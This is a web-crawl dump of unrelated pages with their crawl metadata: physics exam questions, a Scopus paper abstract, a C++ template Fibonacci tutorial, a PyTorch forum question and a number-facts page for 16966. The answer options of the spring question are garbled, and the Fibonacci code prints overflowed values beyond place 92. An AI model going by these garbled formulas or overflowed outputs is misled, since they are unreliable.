[ "# A mass is suspended separately by two springs of spring constants k1 and k2 in successive order. The time periods of oscillations in the two cases are T1 and T2 respectively. If the same mass be suspended by connecting the two springs in parallel, (as shown in figure) then the time period of oscillations is T. The correct relations is", null, "A\n\nT2=T21+T22\n\nB\n\nT2=T21+T22\n\nC\n\nT1=T11+T12\n\nD\n\nT=T1+T2\n\nUpdated on:21/07/2023\nText Solution\nVerified by Experts" ]
[ null, "https://d10lpgp6xz60nq.cloudfront.net/physics_images/ARH_31Y_NEET_PHY_C10_E01_028_Q01.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92685485,"math_prob":0.9398787,"size":3275,"snap":"2023-40-2023-50","text_gpt3_token_len":793,"char_repetition_ratio":0.18587588,"word_repetition_ratio":0.32240438,"special_character_ratio":0.24671756,"punctuation_ratio":0.064714946,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9875806,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-25T04:17:07Z\",\"WARC-Record-ID\":\"<urn:uuid:e8d20864-2aad-4e6f-bea2-7bffd2c4b070>\",\"Content-Length\":\"284590\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a3c3e036-73a3-4cd2-8a3b-21652d972452>\",\"WARC-Concurrent-To\":\"<urn:uuid:06d504d0-5ad8-4531-907d-787c776c9c3e>\",\"WARC-IP-Address\":\"99.84.191.108\",\"WARC-Target-URI\":\"https://www.doubtnut.com/question-answer-physics/a-mass-is-suspended-separately-by-two-springs-of-spring-constants-k1-and-k2-in-successive-order-the--15600026\",\"WARC-Payload-Digest\":\"sha1:NQRVI4QG52JRQQQ2WIZMHH6ULPKCLX5E\",\"WARC-Block-Digest\":\"sha1:GMLRT2WOPSR3BUQ2FQDYGO3Z76VHPXWE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506676.95_warc_CC-MAIN-20230925015430-20230925045430-00202.warc.gz\"}"}
https://yonsei.pure.elsevier.com/en/publications/thermal-instability-in-a-rotating-porous-layer-saturated-by-a-non
[ "# Thermal instability in a rotating porous layer saturated by a non-Newtonian nanofluid with thermal conductivity and viscosity variation\n\nDhananjay Yadav, R. Bhargava, G. S. Agrawal, Nirmal Yadav, Jinho Lee, M. C. Kim\n\nResearch output: Contribution to journalArticle\n\n59 Citations (Scopus)\n\n### Abstract\n\nThe stability of a non-Newtonian nanofluid saturated horizontal rotating porous layer subjected to thermal conductivity and viscosity variation is investigated using linear and nonlinear stability analyses. The model used for the non-Newtonian nanofluid includes the effects of Brownian motion and thermophoresis. The Darcy law for the non-Newtonian nanofluid of the Oldroyd type is used to model the momentum equation. The linear theory based on the normal mode method, and the criteria for both stationary and oscillatory modes are derived analytically. A weak nonlinear analysis based on the minimal representation of truncated Fourier series method containing only two terms is used to compute the concentration and thermal Nusselt numbers. The results obtained during the analysis are presented graphically.\n\nOriginal language English 425-440 16 Microfluidics and Nanofluidics 16 1-2 https://doi.org/10.1007/s10404-013-1234-5 Published - 2014 Jan\n\n### Fingerprint\n\nthermal instability\nThermal conductivity\nthermal conductivity\nThermophoresis\nViscosity\nviscosity\nthermophoresis\nBrownian movement\nFourier series\nNonlinear analysis\nNusselt number\nMomentum\nmomentum\nHot Temperature\n\n### All Science Journal Classification (ASJC) codes\n\n• Electronic, Optical and Magnetic Materials\n• Condensed Matter Physics\n• Materials Chemistry\n\n### Cite this\n\nYadav, Dhananjay ; Bhargava, R. ; Agrawal, G. S. ; Yadav, Nirmal ; Lee, Jinho ; Kim, M. C. / Thermal instability in a rotating porous layer saturated by a non-Newtonian nanofluid with thermal conductivity and viscosity variation. In: Microfluidics and Nanofluidics. 2014 ; Vol. 16, No. 1-2. pp. 425-440.\n@article{75e1a28515bd49ebb939bbdc2d5f3247,\ntitle = \"Thermal instability in a rotating porous layer saturated by a non-Newtonian nanofluid with thermal conductivity and viscosity variation\",\nabstract = \"The stability of a non-Newtonian nanofluid saturated horizontal rotating porous layer subjected to thermal conductivity and viscosity variation is investigated using linear and nonlinear stability analyses. The model used for the non-Newtonian nanofluid includes the effects of Brownian motion and thermophoresis. The Darcy law for the non-Newtonian nanofluid of the Oldroyd type is used to model the momentum equation. The linear theory based on the normal mode method, and the criteria for both stationary and oscillatory modes are derived analytically. A weak nonlinear analysis based on the minimal representation of truncated Fourier series method containing only two terms is used to compute the concentration and thermal Nusselt numbers. The results obtained during the analysis are presented graphically.\",\nauthor = \"Dhananjay Yadav and R. Bhargava and Agrawal, {G. S.} and Nirmal Yadav and Jinho Lee and Kim, {M. C.}\",\nyear = \"2014\",\nmonth = \"1\",\ndoi = \"10.1007/s10404-013-1234-5\",\nlanguage = \"English\",\nvolume = \"16\",\npages = \"425--440\",\njournal = \"Microfluidics and Nanofluidics\",\nissn = \"1613-4982\",\npublisher = \"Springer Verlag\",\nnumber = \"1-2\",\n\n}\n\nThermal instability in a rotating porous layer saturated by a non-Newtonian nanofluid with thermal conductivity and viscosity variation. / Yadav, Dhananjay; Bhargava, R.; Agrawal, G. S.; Yadav, Nirmal; Lee, Jinho; Kim, M. C.\n\nIn: Microfluidics and Nanofluidics, Vol. 16, No. 1-2, 01.2014, p. 425-440.\n\nResearch output: Contribution to journalArticle\n\nTY - JOUR\n\nT1 - Thermal instability in a rotating porous layer saturated by a non-Newtonian nanofluid with thermal conductivity and viscosity variation\n\nAU - Bhargava, R.\n\nAU - Agrawal, G. S.\n\nAU - Lee, Jinho\n\nAU - Kim, M. C.\n\nPY - 2014/1\n\nY1 - 2014/1\n\nN2 - The stability of a non-Newtonian nanofluid saturated horizontal rotating porous layer subjected to thermal conductivity and viscosity variation is investigated using linear and nonlinear stability analyses. The model used for the non-Newtonian nanofluid includes the effects of Brownian motion and thermophoresis. The Darcy law for the non-Newtonian nanofluid of the Oldroyd type is used to model the momentum equation. The linear theory based on the normal mode method, and the criteria for both stationary and oscillatory modes are derived analytically. A weak nonlinear analysis based on the minimal representation of truncated Fourier series method containing only two terms is used to compute the concentration and thermal Nusselt numbers. The results obtained during the analysis are presented graphically.\n\nAB - The stability of a non-Newtonian nanofluid saturated horizontal rotating porous layer subjected to thermal conductivity and viscosity variation is investigated using linear and nonlinear stability analyses. The model used for the non-Newtonian nanofluid includes the effects of Brownian motion and thermophoresis. The Darcy law for the non-Newtonian nanofluid of the Oldroyd type is used to model the momentum equation. The linear theory based on the normal mode method, and the criteria for both stationary and oscillatory modes are derived analytically. A weak nonlinear analysis based on the minimal representation of truncated Fourier series method containing only two terms is used to compute the concentration and thermal Nusselt numbers. The results obtained during the analysis are presented graphically.\n\nUR - http://www.scopus.com/inward/record.url?scp=84899456995&partnerID=8YFLogxK\n\nUR - http://www.scopus.com/inward/citedby.url?scp=84899456995&partnerID=8YFLogxK\n\nU2 - 10.1007/s10404-013-1234-5\n\nDO - 10.1007/s10404-013-1234-5\n\nM3 - Article\n\nAN - SCOPUS:84899456995\n\nVL - 16\n\nSP - 425\n\nEP - 440\n\nJO - Microfluidics and Nanofluidics\n\nJF - Microfluidics and Nanofluidics\n\nSN - 1613-4982\n\nIS - 1-2\n\nER -" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8118723,"math_prob":0.5818248,"size":3841,"snap":"2019-51-2020-05","text_gpt3_token_len":954,"char_repetition_ratio":0.13057075,"word_repetition_ratio":0.6678766,"special_character_ratio":0.22390002,"punctuation_ratio":0.11402157,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95179635,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-27T22:09:33Z\",\"WARC-Record-ID\":\"<urn:uuid:8280a2b1-e6d2-4a9b-8701-837e99c6a18d>\",\"Content-Length\":\"41030\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:81ef4b20-5c6d-4549-a106-5f3da0872f34>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e7c5f61-6ae8-48f6-bc69-6ac4c7dc24e4>\",\"WARC-IP-Address\":\"52.220.215.79\",\"WARC-Target-URI\":\"https://yonsei.pure.elsevier.com/en/publications/thermal-instability-in-a-rotating-porous-layer-saturated-by-a-non\",\"WARC-Payload-Digest\":\"sha1:EBO3LSP3QTZY6VKDXCOOTI2CWABAQUJG\",\"WARC-Block-Digest\":\"sha1:PMXH7D5IQOK646MTANEQV4AMF6BIQL3F\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251728207.68_warc_CC-MAIN-20200127205148-20200127235148-00196.warc.gz\"}"}
https://articles.emptycrate.com/2008/03/09/c_templates_using_templates_to_generate_the_fibonacci_sequence.html
[ "# EmptyCrate\n\n#### About Me | Contact Me | Training | C++ Weekly (YouTube) | Awesome C++ T-Shirts\n\nThe follow code demonstrates a method for generating the Fibonacci Sequence at compile time. Since the sequence is generated at compile time runtime execution of retrieving a number is constant time.\n\nThere is a recursive generation of templated types in this code such that the instantiation of a template: Fib<10> f; generates 11 classes, namely: Fib<0> through Fib<10>.\n\nThe nature of the class generation by the compiler means that previous Fibonacci values are effectively cached, making the compile time go much faster. Therefore, this is pretty much the fastest Fibonacci generator I have seen, even if you include compile time.\n\n``````#include <iostream>\n#include <cassert>\nusing namespace std;\n\ntemplate<int stage>\nstruct Fib\n{\n//Make this value a constant value equal to the (stage-1) + (stage -2)\n//which the compile will generate for us and save in the types of:\n// Fib<stage-1> and Fib<stage-2>. This all works because stage is known at compile\n// time, as all template parameters must be.\nstatic const uint64_t value = Fib<stage-1>::value + Fib<stage-2>::value;\n\nstatic inline uint64_t getValue(int i)\n{\nif (i == stage) // Does the current class hold the given place?\n{\nreturn value; // Return it!\n} else {\nreturn Fib<stage-1>::getValue(i); // Get it from the previous class!\n}\n}\n};\n\ntemplate<> // Template specialization for the 0's case.\nstruct Fib<0>\n{\nstatic const uint64_t value = 1;\n\nstatic inline uint64_t getValue(int i)\n{\nassert(i == 0);\nreturn 1;\n}\n};\n\ntemplate<> // Template specialization for the 1's case\nstruct Fib<1>\n{\nstatic const uint64_t value = 1;\n\nstatic inline uint64_t getValue(int i)\n{\nif (i == 1)\n{\nreturn value;\n} else {\nreturn Fib<0>::getValue(i);\n}\n}\n};\n\nint main(int, char *[])\n{\n//Generate (at compile time) 100 places of the Fib sequence.\n//Then, (at runtime) output the 100 calculated places.\n//Note: a 64 bit int overflows at place 92\nfor (int i = 0; i < 100; ++i)\n{\ncout << \"n:=\" << i << \" => \" << Fib<100>::getValue(i) << endl;\n}\n}\n``````\nMy Videos\n\nRelated" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.71909624,"math_prob":0.9780144,"size":1963,"snap":"2023-40-2023-50","text_gpt3_token_len":500,"char_repetition_ratio":0.13169985,"word_repetition_ratio":0.10670732,"special_character_ratio":0.30565462,"punctuation_ratio":0.1420765,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9860926,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-01T13:09:13Z\",\"WARC-Record-ID\":\"<urn:uuid:219e841b-913c-4d63-8eef-a9910309d37c>\",\"Content-Length\":\"76448\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b547766d-a350-4d72-b609-a151bf01ec60>\",\"WARC-Concurrent-To\":\"<urn:uuid:613ee6ae-f028-43a9-a1ec-1838e427d4ee>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://articles.emptycrate.com/2008/03/09/c_templates_using_templates_to_generate_the_fibonacci_sequence.html\",\"WARC-Payload-Digest\":\"sha1:YOWX53FYNKSGPXBSUFIRLFDV2MK3RVJM\",\"WARC-Block-Digest\":\"sha1:GRSUSIWLY3ANBOGKOTNQHK2KXLHHEN5Z\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100287.49_warc_CC-MAIN-20231201120231-20231201150231-00490.warc.gz\"}"}
https://byjus.com/question-answer/a-glass-sphere-mu-1-5-of-radius-20-cm-has-a-small-air-bubble/
[ "", null, "", null, "Question\n\nA glass sphere $$(\\mu = 1.5)$$ of radius $$20\\ cm$$ has a small air bubble $$4\\ cm$$ below its center. The sphere is viewed from outside and along a vertical line through the bubble. The apparent depth of the bubble below the surface of sphere is (in cm) :\n\nA\n13.33", null, "", null, "B\n26.67", null, "", null, "C\n15", null, "", null, "D\n30", null, "", null, "Solution\n\nThe correct option is B $$26.67$$concept: It is the case of refraction through curved surface formulae used$$\\dfrac{\\mu_2}{v}-\\dfrac{\\mu_1}{u}=\\dfrac{\\mu_2-\\mu_1}{R}$$Given: $$\\mu_2=1$$, $$\\mu_1=1.5$$$$R=-20$$Object distance$$=u=-(20+4)=-24$$Here apparent depth is image distance which is v$$\\dfrac{1}{v}-\\dfrac{1.5}{-24}=\\dfrac{1-1.5}{-20}$$$$\\Rightarrow \\dfrac{1}{v}=\\dfrac{1}{40}-\\dfrac{1}{16}=\\dfrac{-3}{80}$$$$\\Rightarrow v=-\\dfrac{80}{3}=-26.67$$Hence bubble looks at depth of $$26.67$$.", null, "Physics\n\nSuggest Corrections", null, "", null, "0", null, "", null, "Similar questions\nView More", null, "", null, "People also searched for\nView More", null, "" ]
[ null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDQiIGhlaWdodD0iNDQiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "https://search-static.byjusweb.com/question-images/toppr_ext/questions/1446054_1158732_ans_bcf78b623c6a4973ab507e26cf4aa75d.png", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDAiIGhlaWdodD0iNDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDAiIGhlaWdodD0iNDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92193145,"math_prob":0.9999331,"size":267,"snap":"2022-05-2022-21","text_gpt3_token_len":68,"char_repetition_ratio":0.1444867,"word_repetition_ratio":0.0,"special_character_ratio":0.29962546,"punctuation_ratio":0.0754717,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99994767,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-28T02:35:30Z\",\"WARC-Record-ID\":\"<urn:uuid:979a44b6-6b04-4f92-b427-de50695a00c4>\",\"Content-Length\":\"148701\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a1ff3a42-7771-4685-a22c-bd9e6c24d08b>\",\"WARC-Concurrent-To\":\"<urn:uuid:7dbed65a-9a21-4dc9-872f-2bbf0aa4eb3c>\",\"WARC-IP-Address\":\"162.159.129.41\",\"WARC-Target-URI\":\"https://byjus.com/question-answer/a-glass-sphere-mu-1-5-of-radius-20-cm-has-a-small-air-bubble/\",\"WARC-Payload-Digest\":\"sha1:UG6PT74VF3S4562NZLXILTK4D4EIZ7DA\",\"WARC-Block-Digest\":\"sha1:EINDDPYDQJA7XHFLTYYQKM2EJSKQCYBZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320305341.76_warc_CC-MAIN-20220128013529-20220128043529-00487.warc.gz\"}"}
https://discuss.pytorch.org/t/different-optimisers-in-different-layers/72484
[ "# Different Optimisers In Different Layers\n\nHi,\n\nI am currently looking into hybrid neural networks. I would like to apply a different optimizer to quantum circuit compared to the classical layers.\n\nThe quantum circuit has classical input and parameters so it can be optimised by an classical optimiser.\n\nMy network looks like\n\n``````class NeuralNet(nn.Module)\n\ndef __init__(self):\nsuper(NeuralNet, self).__init__()\nself.pre_net = nn.Linear(28*28, 4)\nself.q_params = nn.Parameter(0.01 * torch.randn(q_depth * 4)) #Quantum circuit parameters\nself.post_net = nn.Linear(4, 10)\n``````\n\n1.) How can I apply the same optimiser to all layers, but have a different step size for the quantum circuit parameters\n\n2.) How can I apply a completely different optimiser to the quantum circuit parameters?\n\nReally appreciate the help", null, "" ]
[ null, "https://discuss.pytorch.org/images/emoji/apple/grinning.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.716384,"math_prob":0.89102477,"size":753,"snap":"2022-27-2022-33","text_gpt3_token_len":175,"char_repetition_ratio":0.14285715,"word_repetition_ratio":0.0,"special_character_ratio":0.2430279,"punctuation_ratio":0.15068494,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97771555,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-27T04:37:56Z\",\"WARC-Record-ID\":\"<urn:uuid:aa2d9d0a-1e41-4803-9dda-44d8df2bdde8>\",\"Content-Length\":\"17618\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8fe3bf74-c2bd-430b-a7fb-cc1510582803>\",\"WARC-Concurrent-To\":\"<urn:uuid:be14e541-8ed0-4e11-bf9a-ede6c1487a5c>\",\"WARC-IP-Address\":\"159.203.145.104\",\"WARC-Target-URI\":\"https://discuss.pytorch.org/t/different-optimisers-in-different-layers/72484\",\"WARC-Payload-Digest\":\"sha1:73DOOHNKRQ4YCLACAHMSBGBBFDWGV2MZ\",\"WARC-Block-Digest\":\"sha1:4NC4U36RSMWT4WAHFNGQV6HNUA6THS6P\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103328647.18_warc_CC-MAIN-20220627043200-20220627073200-00527.warc.gz\"}"}
https://number.academy/16966
[ "# Number 16966\n\nNumber 16,966 spell 🔊, write in words: sixteen thousand, nine hundred and sixty-six . Ordinal number 16966th is said 🔊 and write: sixteen thousand, nine hundred and sixty-sixth. The meaning of number 16966 in Maths: Is Prime? Factorization and prime factors tree. The square root and cube root of 16966. What is 16966 in computer science, numerology, codes and images, writing and naming in other languages. Other interesting facts related to 16966.\n\n## What is 16,966 in other units\n\nThe decimal (Arabic) number 16966 converted to a Roman number is (X)(V)MCMLXVI. Roman and decimal number conversions.\n\n#### Weight conversion\n\n16966 kilograms (kg) = 37403.2 pounds (lbs)\n16966 pounds (lbs) = 7695.7 kilograms (kg)\n\n#### Length conversion\n\n16966 kilometers (km) equals to 10543 miles (mi).\n16966 miles (mi) equals to 27305 kilometers (km).\n16966 meters (m) equals to 55663 feet (ft).\n16966 feet (ft) equals 5172 meters (m).\n16966 centimeters (cm) equals to 6679.5 inches (in).\n16966 inches (in) equals to 43093.6 centimeters (cm).\n\n#### Temperature conversion\n\n16966° Fahrenheit (°F) equals to 9407.8° Celsius (°C)\n16966° Celsius (°C) equals to 30570.8° Fahrenheit (°F)\n\n#### Time conversion\n\n(hours, minutes, seconds, days, weeks)\n16966 seconds equals to 4 hours, 42 minutes, 46 seconds\n16966 minutes equals to 1 week, 4 days, 18 hours, 46 minutes\n\n### Codes and images of the number 16966\n\nNumber 16966 morse code: .---- -.... ----. -.... -....\nSign language for number 16966:", null, "", null, "", null, "", null, "", null, "Number 16966 in braille:", null, "Images of the number\nImage (1) of the numberImage (2) of the number", null, "", null, "More images, other sizes, codes and colors ...\n\n#### Number 16966 infographic", null, "## Share in social networks", null, "## Mathematics of no. 16966\n\n### Multiplications\n\n#### Multiplication table of 16966\n\n16966 multiplied by two equals 33932 (16966 x 2 = 33932).\n16966 multiplied by three equals 50898 (16966 x 3 = 50898).\n16966 multiplied by four equals 67864 (16966 x 4 = 67864).\n16966 multiplied by five equals 84830 (16966 x 5 = 84830).\n16966 multiplied by six equals 101796 (16966 x 6 = 101796).\n16966 multiplied by seven equals 118762 (16966 x 7 = 118762).\n16966 multiplied by eight equals 135728 (16966 x 8 = 135728).\n16966 multiplied by nine equals 152694 (16966 x 9 = 152694).\nshow multiplications by 6, 7, 8, 9 ...\n\n### Fractions: decimal fraction and common fraction\n\n#### Fraction table of 16966\n\nHalf of 16966 is 8483 (16966 / 2 = 8483).\nOne third of 16966 is 5655,3333 (16966 / 3 = 5655,3333 = 5655 1/3).\nOne quarter of 16966 is 4241,5 (16966 / 4 = 4241,5 = 4241 1/2).\nOne fifth of 16966 is 3393,2 (16966 / 5 = 3393,2 = 3393 1/5).\nOne sixth of 16966 is 2827,6667 (16966 / 6 = 2827,6667 = 2827 2/3).\nOne seventh of 16966 is 2423,7143 (16966 / 7 = 2423,7143 = 2423 5/7).\nOne eighth of 16966 is 2120,75 (16966 / 8 = 2120,75 = 2120 3/4).\nOne ninth of 16966 is 1885,1111 (16966 / 9 = 1885,1111 = 1885 1/9).\nshow fractions by 6, 7, 8, 9 ...\n\n### Calculator\n\n 16966\n\n#### Is Prime?\n\nThe number 16966 is not a prime number. The closest prime numbers are 16963, 16979.\n\n#### Factorization and factors (dividers)\n\nThe prime factors of 16966 are 2 * 17 * 499\nThe factors of 16966 are 1 , 2 , 17 , 34 , 499 , 998 , 8483 , 16966\nTotal factors 8.\nSum of factors 27000 (10034).\n\n#### Powers\n\nThe second power of 169662 is 287.845.156.\nThe third power of 169663 is 4.883.580.916.696.\n\n#### Roots\n\nThe square root √16966 is 130,253599.\nThe cube root of 316966 is 25,695663.\n\n#### Logarithms\n\nThe natural logarithm of No. ln 16966 = loge 16966 = 9,738967.\nThe logarithm to base 10 of No. log10 16966 = 4,229579.\nThe Napierian logarithm of No. log1/e 16966 = -9,738967.\n\n### Trigonometric functions\n\nThe cosine of 16966 is 0,170292.\nThe sine of 16966 is 0,985394.\nThe tangent of 16966 is 5,786504.\n\n### Properties of the number 16966\n\nIs a Friedman number: No\nIs a Fibonacci number: No\nIs a Bell number: No\nIs a palindromic number: No\nIs a pentagonal number: No\nIs a perfect number: No\n\n## Number 16966 in Computer Science\n\nCode typeCode value\n16966 Number of bytes16.6KB\nUnix timeUnix time 16966 is equal to Thursday Jan. 1, 1970, 4:42:46 a.m. GMT\nIPv4, IPv6Number 16966 internet address in dotted format v4 0.0.66.70, v6 ::4246\n16966 Decimal = 100001001000110 Binary\n16966 Decimal = 212021101 Ternary\n16966 Decimal = 41106 Octal\n16966 Decimal = 4246 Hexadecimal (0x4246 hex)\n16966 BASE64MTY5NjY=\n16966 MD5bb2825b78d37fef9ecabb1b91a8a6b88\n16966 SHA1645b71d515f126bf0bf2ce0c0ab76b99b1ff0af4\n16966 SHA224a1ee0d382a6fb4d309139e44afdf84e0bc9158922330cba51692fa89\n16966 SHA256acdf413fc28537565e558fe239ea5b5dd0b5da6447775e4fab75ca8bb3b42c87\n16966 SHA384353425bd6eec6831c20a16c2f28811eb0026c5d0fa3e55c62e132d348a00c6b2663cff2948a73551c8708bd4cdf60bf4\nMore SHA codes related to the number 16966 ...\n\nIf you know something interesting about the 16966 number that you did not find on this page, do not hesitate to write us here.\n\n## Numerology 16966\n\n### Character frequency in number 16966\n\nCharacter (importance) frequency for numerology.\n Character: Frequency: 1 1 6 3 9 1\n\n### Classical numerology\n\nAccording to classical numerology, to know what each number means, you have to reduce it to a single figure, with the number 16966, the numbers 1+6+9+6+6 = 2+8 = 1+0 = 1 are added and the meaning of the number 1 is sought.\n\n## Interesting facts about the number 16966\n\n### Asteroids\n\n• (16966) 1998 SM63 is asteroid number 16966. It was discovered by Beijing Schmidt CCD Asteroid Program from Xinglong Station on 9/29/1998.\n\n### Distances between cities\n\n• There is a 10,543 miles (16,966 km) direct distance between Guiyang (China) and Nova Iguaçu (Brazil).\n• There is a 10,543 miles (16,966 km) direct distance between Hanoi (Viet Nam) and Medellín (Colombia).\n• There is a 10,543 miles (16,966 km) direct distance between Meerut (India) and Santiago (Chile).\n\n## Number 16,966 in other languages\n\nHow to say or write the number sixteen thousand, nine hundred and sixty-six in Spanish, German, French and other languages. The character used as the thousands separator.\n Spanish: 🔊 (número 16.966) dieciseis mil novecientos sesenta y seis German: 🔊 (Anzahl 16.966) sechzehntausendneunhundertsechsundsechzig French: 🔊 (nombre 16 966) seize mille neuf cent soixante-six Portuguese: 🔊 (número 16 966) dezesseis mil, novecentos e sessenta e seis Chinese: 🔊 (数 16 966) 一万六千九百六十六 Arabian: 🔊 (عدد 16,966) ستة عشر ألفاً و تسعمائةستة و ستون Czech: 🔊 (číslo 16 966) šestnáct tisíc devětset šedesát šest Korean: 🔊 (번호 16,966) 만 육천구백육십육 Danish: 🔊 (nummer 16 966) sekstentusinde og nihundrede og seksogtreds Dutch: 🔊 (nummer 16 966) zestienduizendnegenhonderdzesenzestig Japanese: 🔊 (数 16,966) 一万六千九百六十六 Indonesian: 🔊 (jumlah 16.966) enam belas ribu sembilan ratus enam puluh enam Italian: 🔊 (numero 16 966) sedicimilanovecentosessantasei Norwegian: 🔊 (nummer 16 966) seksten tusen, ni hundre og seksti-seks Polish: 🔊 (liczba 16 966) szesnaście tysięcy dziewięćset sześćdziesiąt sześć Russian: 🔊 (номер 16 966) шестнадцать тысяч девятьсот шестьдесят шесть Turkish: 🔊 (numara 16,966) onaltıbindokuzyüzaltmışaltı Thai: 🔊 (จำนวน 16 966) หนึ่งหมื่นหกพันเก้าร้อยหกสิบหก Ukrainian: 🔊 (номер 16 966) шiстнадцять тисяч дев'ятсот шiстдесят шiсть Vietnamese: 🔊 (con số 16.966) mười sáu nghìn chín trăm sáu mươi sáu Other languages ...\n\n## News to email\n\nPrivacy Policy.\n\n## Comment\n\nIf you know something interesting about the number 16966 or any natural number (positive integer) please write us here or on facebook." ]
[ null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-1.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-6.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-9.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-6.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-6.png", null, "https://number.academy/img/braille-16966.svg", null, "https://numero.wiki/img/a-16966.jpg", null, "https://numero.wiki/img/b-16966.jpg", null, "https://number.academy/i/infographics/6/number-16966-infographic.png", null, "https://numero.wiki/s/share-desktop.png", null ]
